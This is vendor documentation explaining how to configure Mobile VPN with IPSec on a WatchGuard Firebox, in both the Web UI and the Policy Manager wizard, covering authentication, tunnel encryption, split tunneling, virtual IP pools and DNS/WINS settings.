Configure the Firebox for Mobile VPN with IPSec

In Fireware v12.2.1 or lower, the steps to configure Mobile VPN with IPSec are different. In Fireware Web UI, select VPN > Mobile VPN with IPSec.

1. Select VPN > Mobile VPN.
   The Mobile VPN selection page appears.
2. In the Mobile VPN with IPSec section, click Configure.
   The Mobile VPN with IPSec list appears.

3. Click Add.
   The Mobile User VPN with IPSec Settings page appears.

4. In the Name text box, type a name for this Mobile VPN group.
   You can type the name of an existing group or the name for a new Mobile VPN group. Make sure the name is unique among VPN group names as well as all interface and VPN tunnel names.

If you create a Mobile VPN user group that authenticates to an external authentication server, make sure you create a group on the server with the same name you specified in the wizard for the Mobile VPN group. If you use Active Directory as your authentication server, the users must belong to an Active Directory security group with the same name as the group name you configure for Mobile VPN with IPSec. For more information, go to Configure the External Authentication Server.

5. Configure these settings to edit the group profile:

Authentication Server

Select the authentication server to use for this Mobile VPN group. You can authenticate users with the internal Firebox database (Firebox-DB) or with a RADIUS, VASCO, SecurID, LDAP, or Active Directory server. Make sure that the method of authentication you choose is enabled.

Passphrase

Type a passphrase to encrypt the Mobile VPN profile (.wgx file) that you distribute to users in this group. The shared key can use only standard ASCII characters. If you use a certificate for authentication, this passphrase is also used to encrypt the exported certificate file you send to users.

Confirm

Type the passphrase again.

Primary

Type the primary external IP address to which Mobile VPN users in this group can connect. This can be an external IP address, secondary external IP address, or external VLAN. For a device in drop-in mode, use the IP address assigned to all interfaces.

If your Firebox has a dynamic IP address, you can specify a domain name for client connections instead of an IP address. To connect to the mobile VPN, users specify the domain name in the mobile VPN client settings. Make sure to register the external IP address of your Firebox with a dynamic DNS service provider. Optionally, you can enable dynamic DNS on the Firebox to automatically send IP address updates to a dynamic DNS service provider that the Firebox supports. For more information about dynamic DNS, go to About the Dynamic DNS Service.

Backup

Type a backup external IP address to which Mobile VPN users in this group can connect. This backup IP address is optional. If you add a backup IP address, make sure it is an IP address assigned to an external interface or VLAN.

Session Timeout

Select the maximum time in minutes that a Mobile VPN session can be active.

Idle Timeout

Select the time in minutes before the Firebox closes an idle Mobile VPN session. The session and idle timeout values are the default timeout values if the authentication server does not have its own timeout values. If you use the Firebox as the authentication server, the timeouts for the Mobile VPN group are always ignored because you set timeouts for each Firebox user account.

The session and idle timeouts cannot be longer than the value in the SA Life field.
To set this value, in the Mobile VPN with IPSec Settings dialog box, click the IPSec Tunnel tab, and click Advanced for Phase 1 Settings. The default value is 8 hours.

6. Select the IPSec Tunnel tab.
   The IPSec Tunnel page opens.

7. Configure these settings:

Use the passphrase of the end user profile as the pre-shared key

Select this option to use the passphrase of the end user profile as the pre-shared key for tunnel authentication. You must use the same shared key on the remote device. This shared key can use only standard ASCII characters.

Use a certificate

Select this option to use a certificate for tunnel authentication.
For more information about Mobile VPN with IPSec certificates, see Certificates for Mobile VPN With IPSec Tunnel Authentication (Web UI).

CA IP address

If you use a certificate, type the IP address of the Management Server that has been configured as a certificate authority.

Timeout

If you use a certificate, type the time in seconds before the Mobile VPN with IPSec client stops an attempt to connect if there is no response from the certificate authority. We recommend you keep the default value.

Phase 1 Settings

Select the authentication and encryption methods for the VPN tunnel. To configure advanced settings, such as NAT Traversal or the key group, click Advanced, and see Define Advanced Phase 1 Settings.

The Encryption options are listed from the most simple and least secure, to the most complex and most secure:

• DES
• 3DES
• AES (128 bit)
• AES (192 bit)
• AES (256 bit) (default setting)

Phase 2 Settings

By default, PFS (Perfect Forward Secrecy) is enabled. From the drop-down list, select the Diffie-Hellman group.

To change other proposal settings, click Advanced and see Define Advanced Phase 2 Settings.

8. Select the Resources tab.
   The Resources page appears.

9. Configure these settings:

Allow All Traffic Through Tunnel

To send all Mobile VPN user Internet traffic through the VPN tunnel, select this check box.
If you select this check box, the Mobile VPN user Internet traffic is sent through the VPN. This is more secure, but network performance decreases.
If you do not select this check box, Mobile VPN user Internet traffic is sent directly to the Internet. This is less secure, but users can browse the Internet more quickly.

Allowed Resources

This list includes the resources that users in the Mobile VPN authentication group can get access to on the network.

To add an IP address or a network IP address to the network resources list, click Add. Select Host IPv4 or Network IPv4, type the address, and click OK.

To delete the selected IP address or network IP address from the resources list, select a resource and click Remove.

Virtual IP Address Pool

This list includes the internal IP addresses that are used by Mobile VPN users over the tunnel.

To add an IP address or a network IP address to the virtual IP address pool, click Add. Select Host IPv4 or Network IPv4, type the address, and click OK.

To remove it from the virtual IP address pool, select a host or network IP address and click Remove.

WARNING: The IP addresses in the virtual IP address pool cannot be used for anything else on your network.

For more information about virtual IP addresses, see Virtual IP Addresses and Mobile VPNs.

10. Select the Advanced tab.
    The Advanced page appears.

11. Configure the Line Management settings:

Connection mode

Manual — In this mode, the client does not try to restart the VPN tunnel automatically if the VPN tunnel goes down. This is the default setting.

To restart the VPN tunnel, you must click the Connect button in Connection Monitor, or right-click the Mobile VPN icon on your Windows desktop toolbar and click Connect.

Automatic — In this mode, the client tries to start the connection when your computer sends traffic to a destination that you can reach through the VPN. The client also tries to restart the VPN tunnel automatically if the VPN tunnel becomes unavailable.

Variable — In this mode, the client tries to restart the VPN tunnel automatically until you click Disconnect. After you disconnect, the client does not try to restart the VPN tunnel again until you click Connect.

Inactivity timeout

If the Connect Mode is set to Automatic or Variable, the Mobile VPN with IPSec client software does not try to renegotiate the VPN connection until there has not been traffic from the network resources available through the tunnel for the length of time you enter for Inactivity timeout.

The default Line Management settings are Manual and 0 seconds. If you change either setting, you must use the .ini file to configure the client software.

12. (Fireware v12.2.1 or higher) Configure the DNS settings:

Assign the network DNS/WINS settings to mobile clients

If you select this option, mobile clients receive the DNS and WINS settings you specify at Network > Interfaces > DNS/WINS. For example, if you specify the DNS server 203.0.113.50 in the Network DNS/WINS settings, mobile VPN clients use 203.0.113.50 as a DNS server.

By default, the Assign the Network DNS/WINS Server settings to mobile clients setting is selected for new mobile VPN configurations.

Do not assign DNS or WINS settings to mobile clients

If you select this option, clients do not receive DNS or WINS settings from the Firebox.

Assign these settings to mobile clients

If you select this option, mobile clients receive the domain name, DNS server, and WINS server settings you specify in this section. For example, if you specify example.com as the domain name and 203.0.113.50 as the DNS server, mobile clients use example.com for unqualified domain names and 203.0.113.50 as the DNS server.

You can specify one domain name, up to two DNS server IP addresses, and up to two WINS server IP addresses.

For more information about DNS and WINS server settings for Mobile VPN with IPSec users, see Configure DNS and WINS Servers for Mobile VPN with IPSec.

13. Click Save.
    The Mobile VPN with IPSec page opens and the new IPSec group appears in the Groups list.
14. Click Save.

1. Select VPN > Mobile VPN > IPSec.
   The Mobile VPN with IPSec Configuration dialog box appears.

2. Click Add.
   The Add Mobile VPN with IPSec Wizard appears.

3. Click Next.
   The Select a user authentication server screen appears.

4. From the Authentication Server drop-down list, select an authentication server.

You can authenticate users to the Firebox (Firebox-DB) or to a RADIUS, VASCO, SecurID, LDAP, or Active Directory server. Make sure that this method of authentication is enabled in Policy Manager. Select Setup > Authentication > Authentication Servers to see these settings.

5. In the Group Name text box, type the name of the group.

You can type the name of a Mobile VPN group you have already created, or type a group name for a new Mobile VPN group. Make sure the name is unique among VPN group names, as well as all interface and tunnel names.

For more information about VPN group authentication, go to Types of Firebox Authentication.

If you create a Mobile VPN user group that authenticates to an external authentication server, make sure you create a group on the server with the same name you specified in the wizard for the Mobile VPN group. If you use Active Directory as your authentication server, the users must belong to an Active Directory security group with the same name as the group name you configure for Mobile VPN with IPSec. For more information, go to Configure the External Authentication Server.

6. Click Next.
   The Select a tunnel authentication method screen appears.

7. Select an option for tunnel authentication:

• Use this passphrase
  
  Type and confirm the passphrase.
• Use an RSA certificate issued by your WatchGuard Management Server
  Type the IP Address of your Management Server and the Administration Passphrase.

For more information about how to use an RSA certificate, go to Certificates for Mobile VPN With IPSec Tunnel Authentication (Web UI).

8. Click Next.
   The Direct the flow of Internet traffic screen appears.

9. Select an option for Internet traffic:

• No, allow Internet traffic to go directly to the mobile user's ISP.
  
  (Split tunneling)
• Yes, force all Internet traffic to flow through the tunnel.
  
  (Default-route VPN)

For more information about split tunneling and default-route VPN, go to Options for Internet Access Through a Mobile VPN with IPSec Tunnel.

10. Click Next.
    The Identify the resources accessible through the tunnel screen appears.

11. Click Add to specify the host or network IP addresses that users can connect to through the VPN tunnel.
12. Click Next.
    The Create the virtual IP address pool screen appears.

13. Click Add to add one IP address or an IP address range.
    To add more virtual IP addresses, repeat this step.

Mobile VPN users are assigned an IP address from the virtual IP address pool when they connect to your network. The number of IP addresses in the virtual IP address pool should be the same as the number of Mobile VPN users. If a FireCluster is configured, you must add two virtual IP addresses for each Mobile VPN user.

WARNING: The virtual IP addresses must be on a different subnet than the local networks. The virtual IP addresses cannot be used for anything else on your network.

For more information about virtual IP addresses, go to Virtual IP Addresses and Mobile VPNs.

14. Click Next.
    If you used a certificate for tunnel authentication, the Encrypt the VPN configuration file screen appears.

15. Type and confirm the passphrase to use to encrypt the .wgx configuration file and the PKCS#12 certificate that is saved when you generate the VPN configuration file from Policy Manager.

If you used a passphrase for tunnel authentication, the wizard skips this step and the tunnel passphrase you specified earlier is used to encrypt the VPN configuration file.

16. Click Next.
    The Add Mobile VPN with IPSec Wizard has completed successfully screen appears.
    

The Mobile VPN with IPSec group user configuration file is available at the location specified on this screen.

17. To add users to the new Mobile VPN with IPSec group, select the Add users check box.
18. Click Finish.

After the wizard completes, you can edit the group profile you just created to:

• Change the shared key
• Add access to more hosts or networks
• Restrict access to a single destination port, source port, or protocol
• Change the Phase 1 or Phase 2 settings
• (Fireware v12.2.1 or higher) Specify DNS and WINS server settings
  For more information about DNS and WINS server settings for Mobile VPN with IPSec users, go to Configure DNS and WINS Servers for Mobile VPN with IPSec.
  

To edit the profile, go to Modify an Existing Mobile VPN with IPSec Group Profile.